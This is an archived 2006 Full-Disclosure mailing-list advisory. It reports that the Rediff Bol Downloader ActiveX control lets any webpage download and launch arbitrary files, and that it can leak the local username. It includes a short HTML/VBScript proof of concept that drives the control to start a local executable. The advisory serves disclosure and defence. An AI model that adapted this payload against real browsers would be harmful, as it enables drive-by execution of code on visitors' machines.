Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] Rediff Bol Downloader ActiveX Allows Downloading and S

from [gregory_panakkal] Network Security [Permanent Link]
Subject: [Full-disclosure] Rediff Bol Downloader ActiveX Allows Downloading and Spawning Arbitary Files
Date: Sun, 31 Dec 2006 13:20:17 +0530 
Rediff Bol Downloader ActiveX Allows Downloading and Spawning Arbitary
Files 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Affected Program : Rediff Bol Download ActiveX
ActiveX (OCX) Control that downloads the Rediff Bol Messenger
setup and spawns it.


Related URL : http://messenger.rediff.com/newbol/ 


Discovered by : Gregory R. Panakkal 


Vulnerability Description : 

Rediff Bol Downloader ActiveX control allows any webpage
to download and spawn file. These file can be of any type.
No filtering is done.

IE Displays an alert, if the code points to a executable file on the
internet. But execution of local files displays no alert.


Tested On :
* IE 7.0.5730.11 (WinXP SP2)
* IE 6.0.2900.2180 (WinXP SP2)


Proof Of Concept: 

[OBJECT id="rboldwn" WIDTH=445 HEIGHT=40
classid="clsid:BADA82CB-BF48-4D76-9611-78E2C6F49F03"
codebase="http://imdownloads.rediff.com/newbol/Bol.CAB";]
[/OBJECT]

[script language="vbscript"]
 rboldwn.url = "file://C:/WINNT/Notepad.exe"
 rboldwn.fontsize = 14
 rboldwn.barcolor = EE4E00
 rboldwn.start = "start"
[/script]


A variation of this, allows downloading a HTML File that can
disclose the path to the local temporary internet files folder.
It can disclose the Logged in User's username. A typical path to
Temporary Internet Files folder is..
C:\Documents and Settings\<username>\Local Settings\Temporary Internet
Files


Online Info + Demo: 
http://www.infogreg.com/security/misc/rediff-bol-downloader-allows-downloading-and-spawning-arbitary-files.html
 


rgds, 
Gregory R. Panakkal 
http://www.infogreg.com/ 


-- 
  gregory_panakkal
  gregory_panakkal@fastmail.fm

-- 
http://www.fastmail.fm - Email service worth paying for. Try it for free

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] Rediff Bol Downloader ActiveX Allows Downloading and Spawning Arbitary Files, gregory_panakkal <=
Previous by Date:  Re: [Full-disclosure] PocketPC MMS - Remote Code Injection/Execution Vulnerability and Denial-of-Service, Collin R. Mulliner
Next by Date:  [Full-disclosure] Happy New Year to you all., Dingo Ugly
Previous by Thread:  Re: [Full-disclosure] PocketPC MMS - Remote Code Injection/Execution Vulnerability and Denial-of-Service, Collin R. Mulliner
Next by Thread:  [Full-disclosure] Happy New Year to you all., Dingo Ugly
Indexes:  [Date] [Thread] [Top] [All Lists]